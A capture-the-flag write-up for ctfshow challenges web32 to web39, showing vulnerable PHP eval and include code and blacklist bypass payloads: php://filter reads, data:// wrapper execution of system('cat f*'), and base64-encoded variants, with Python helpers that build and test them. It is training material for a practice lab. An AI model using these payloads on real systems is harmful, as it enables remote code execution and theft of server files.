ctfshow web beginner: command execution
阿新 • Published: 2021-10-30
web32
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: [email protected]
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Both ( and ; are blocked here. The PHP language constructs that work without parentheses are echo, print, die, include, require, include_once and require_once; echo itself is also on the blacklist, and with ; blocked as well, the statement has to be terminated by closing the PHP block with ?> instead of a semicolon.
Use include together with the php://filter wrapper to read the PHP file. Every blocked string (php, flag and the dot) goes into a second GET parameter, which the preg_match never inspects:
payload:
?c=include$_GET[0]?>&0=php://filter/read=convert.base64-encode/resource=flag.php
Base64-decode the output to get the flag.
web33 through web35 are solved the same way.
web36
Digits are filtered as well, so rename the second GET parameter from 0 to a letter:
payload:
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
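As an added example (not part of the original write-up), the following Python reproduces the web32 blacklist locally, builds the web32 and web36 payloads, and decodes the base64 that php://filter returns. It assumes the web36 pattern is the web32 pattern plus [0-9], which is what "digits are filtered" describes; the flag.php contents and the server response are constructed stand-ins, not challenge data.

```python
import base64
import re

# Blacklist copied from the web32 source above, as a Python regex (re.I mirrors
# the /i flag). The web36 pattern is an assumption: the same list plus [0-9].
WEB32_BLACKLIST = r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\("
WEB36_BLACKLIST = WEB32_BLACKLIST + r"|[0-9]"


def reaches_eval(c: str, blacklist: str) -> bool:
    """True if this (URL-decoded) value of c survives preg_match and is eval()'d."""
    return re.search(blacklist, c, re.I) is None


def build_query(param: str, target: str = "flag.php") -> str:
    """Build the ?c=...&<param>=... query string used against web32-36.

    Every blocked string (php, flag, the dot, the parentheses) lives in the
    second parameter, which the challenge never inspects. '?>' closes the PHP
    block, so the include statement needs no ';'. A client such as requests
    will percent-encode the string as needed.
    """
    c = f"include$_GET[{param}]?>"
    resource = f"php://filter/read=convert.base64-encode/resource={target}"
    return f"?c={c}&{param}={resource}"


def decode_filter_output(body: str) -> str:
    """php://filter with convert.base64-encode returns the file base64-encoded;
    decode it back to the PHP source."""
    return base64.b64decode(body.strip()).decode()


# Constructed stand-in for flag.php and for the response body the server
# would return for it (not real challenge data).
SAMPLE_FLAG_PHP = '<?php\n$flag = "ctfshow{example-not-a-real-flag}";\n'
SAMPLE_RESPONSE = base64.b64encode(SAMPLE_FLAG_PHP.encode()).decode()

if __name__ == "__main__":
    for payload in ['system("cat flag.php");', "include$_GET[0]?>", "include$_GET[a]?>"]:
        print(f"{payload!r:30} web32: {reaches_eval(payload, WEB32_BLACKLIST)!s:5} "
              f"web36: {reaches_eval(payload, WEB36_BLACKLIST)}")
    print(build_query("0"))   # web32-35 payload
    print(build_query("a"))   # web36 payload (no digits in c)
    print(decode_filter_output(SAMPLE_RESPONSE))
```

The check is done on the URL-decoded value, exactly as PHP sees $_GET['c']; the naive system("cat flag.php"); payload trips five different entries of the blacklist, while include$_GET[0]?> trips none on web32 and only [0-9] on web36.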
web37
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: [email protected]
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
The GET value goes straight into include(), so use the data:// wrapper to execute PHP that reads the flag. Only the string flag is filtered, so a shell glob stands in for the file name:
payload:
?c=data://text/plain,<?php system("cat f*");
or
?c=data://text/plain,<?php system("cat fla*")?>
web38
web38 filters two more strings, file and php. Bypass with the PHP short echo tag <?=, which contains neither:
or base64-encode the payload, since the encoded string contains none of the filtered words:
?c=data://text/plain,<?= system("cat fla*")?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs=
web39
web39 changes only the include line:

if(!preg_match("/flag/i", $c)){
    include($c.".php");

With a data://text/plain, payload the include therefore runs <PHP code>.php. As long as the PHP code closes its block with ?>, the appended .php falls outside the block and is treated as HTML: it is simply printed on the page and has no effect, so the closed-tag payloads from web37 and web38 still work.
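As an added example for web37 through web39 (not part of the original write-up), the following Python builds the data:// payloads in both plain and base64 form, checks them against the web37 and web38 filters, recovers what include() actually compiles, and simulates web39's appended .php to show why a closing ?> matters. The web38 pattern is assumed to be the web37 pattern with php and file added, as the write-up describes.

```python
import base64
import re
from typing import Optional, Tuple

# Filters for the three challenges. web37's is taken from the source above;
# web38's is assumed to be the same pattern with file and php added.
WEB37_FILTER = r"flag"
WEB38_FILTER = r"flag|php|file"


def reaches_include(c: str, pattern: str) -> bool:
    """True if this (URL-decoded) value of c survives preg_match and reaches include()."""
    return re.search(pattern, c, re.I) is None


def data_payload(php_code: str, as_base64: bool = False) -> str:
    """Build a data:// URI whose body include() will compile and run."""
    if as_base64:
        return "data://text/plain;base64," + base64.b64encode(php_code.encode()).decode()
    return "data://text/plain," + php_code


def data_body(uri: str) -> str:
    """Recover what include() compiles: the body after the comma, base64-decoded
    when the media type carries the ;base64 parameter."""
    head, _, body = uri.partition(",")
    return base64.b64decode(body).decode() if head.endswith(";base64") else body


def text_after_last_close_tag(php_source: str) -> Optional[str]:
    """Text following the last '?>' is outside any PHP block and is echoed as
    HTML. Returns None when the source never closes its PHP block."""
    _, sep, trailing = php_source.rpartition("?>")
    return trailing if sep else None


def web39_view(uri: str) -> Tuple[str, Optional[str]]:
    """Simulate web39's include($c.'.php') on a plain-text data:// payload.

    Returns (source that gets compiled, text echoed verbatim). A None second
    element means '.php' landed inside the PHP block, i.e. a parse error.
    Only the plain form is simulated: appending '.php' to a ;base64 body
    corrupts the base64, which is a different failure.
    """
    if uri.split(",", 1)[0].endswith(";base64"):
        raise ValueError("web39 simulation covers the plain data://text/plain form only")
    source = data_body(uri + ".php")
    return source, text_after_last_close_tag(source)


if __name__ == "__main__":
    plain = data_payload('<?php system("cat fla*")?>')
    short = data_payload('<?= system("cat fla*")?>')
    b64 = data_payload('<?php system("cat flag.php");', as_base64=True)
    for name, p in [("plain", plain), ("short tag", short), ("base64", b64)]:
        print(f"{name:10} web37: {reaches_include(p, WEB37_FILTER)!s:5} "
              f"web38: {reaches_include(p, WEB38_FILTER)}")
    print(data_body(b64))
    print(web39_view(short))
    print(web39_view(data_payload('<?php system("cat fla*");')))
```

The base64 form reproduces the exact string in the web38 payload above, and the filter check on it passes because none of flag, php or file survives encoding. The last web39_view call shows the failure mode: without a closing ?>, the appended .php ends up inside the PHP block and nothing runs.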